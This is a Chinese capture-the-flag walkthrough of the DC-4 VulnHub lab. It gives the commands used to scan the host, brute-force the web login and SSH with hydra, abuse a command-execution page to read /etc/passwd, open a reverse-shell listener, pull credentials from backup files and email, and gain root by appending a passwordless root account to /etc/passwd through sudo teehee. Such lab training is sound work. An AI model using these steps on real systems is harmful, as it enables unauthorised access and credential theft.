自学内容网 自学内容网

DC-4靶机

下载地址:https://vulnhub.com/entry/dc-4,313/

解压缩,直接拖进去vmware虚拟机中

这里我们要把这台靶机设置为NAT模式,和kali虚拟机要在同一网段

DC-4靶机页面内容

 

扫描ip下面有三种工具来扫描

1、用arp扫描

2、用netdiscover扫描ip

netdiscover -i eth0

3、用fscan工具扫描

fscan -h 192.168.142.0/24

都扫描出来为192.168.142.153,为DC-4靶机的ip

扫描端口

nmap -sS -A -Pn -T4 --min-rate=1000 192.168.142.153

扫描出来开放的端口为22 ssh和80 http

扫描目录

dirsearch -u http://192.168.142.153/ -x 403 404 500 503 501

没有扫描出来200的网页,我们去访问一下网页http://192.168.142.153/ 

发现有一个登录页面,没有账号密码,有可能Admin是账号,我们随便弱口令登录一下并且抓包爆破一下

密码和账号明文传输,连token都没有

 

发现没有爆破出来,我们用kali虚拟机中的hydra工具来爆破

编辑一个user.txt,里面写入账号

再去hydra中自带的爆破字典中找一个密码字典

cd /usr/share/wordlists
ls

看见有一个rockyou.txt.gz的压缩包文件,用命令解压一下

 

gzip -d rockyou.txt.gz
ls

用hydra来爆破

 hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.142.153 http-post-form "/login.php:username=^USER^&password=^PASS^:S=loginout" -F

http-post-form意思是用post方式来提交,我们查看源代码

发现用的是form表单,post提交方式

login.php是我们抓包这里

S=loginout意思是如果找到密码就登出

我们可以看到账号为admin,密码为happy

我们就登录进来了,点command逛一下

能够执行命令,我们去现在这个页面抓包发送到repater去执行一些其他命令

whoami可以回显为www-data,为apache中间件

cat+etc/passwd  这里空格要用+代替

找到后面带有/bin/bash或者/bin/sh的用户记录下来

charles jim sam

既然能执行命令那么我们就可以反弹shell,我用的公网反弹,也可以用kali

nv -lvnp 9001   开启监听端口

制作反弹shell的语句

然后发送一下,监听端口有记录

可以看到有三个用户,进去jim看一眼,有一个backups的文件,进去看一下

有一个old-passwords.bak的文件

里面是密码,生成密码爆破的文件,用hydra来爆破一下

vim user.txt

vim password.txt

 

hydra -L user.txt -P password.txt -t 64 ssh://192.168.142.153

 

爆破出ssh的账号密码为jim/jibril04,进行登录

发现有邮件mail,我们可以查看一下

邮件内容中有账号和密码

Password is: ^xHhA&hvim0y

切换charles用户,因为是charles给jim发的邮件,我们要在监听成功的地方直接写命令

用python启一个交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

ssh jim@192.168.142.153
密码为jibril04
su charles   进去charles
密码  ^xHhA&hvim0y
echo "admin::0:0:::/bin/bash" |sudo teehee -a /etc/passwd   提升权限用admin登录
su admin  就进去admin
cd /root
ls
cat flag.txt   

找到flag


原文地址:https://blog.csdn.net/ppkr_itt/article/details/143951881

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!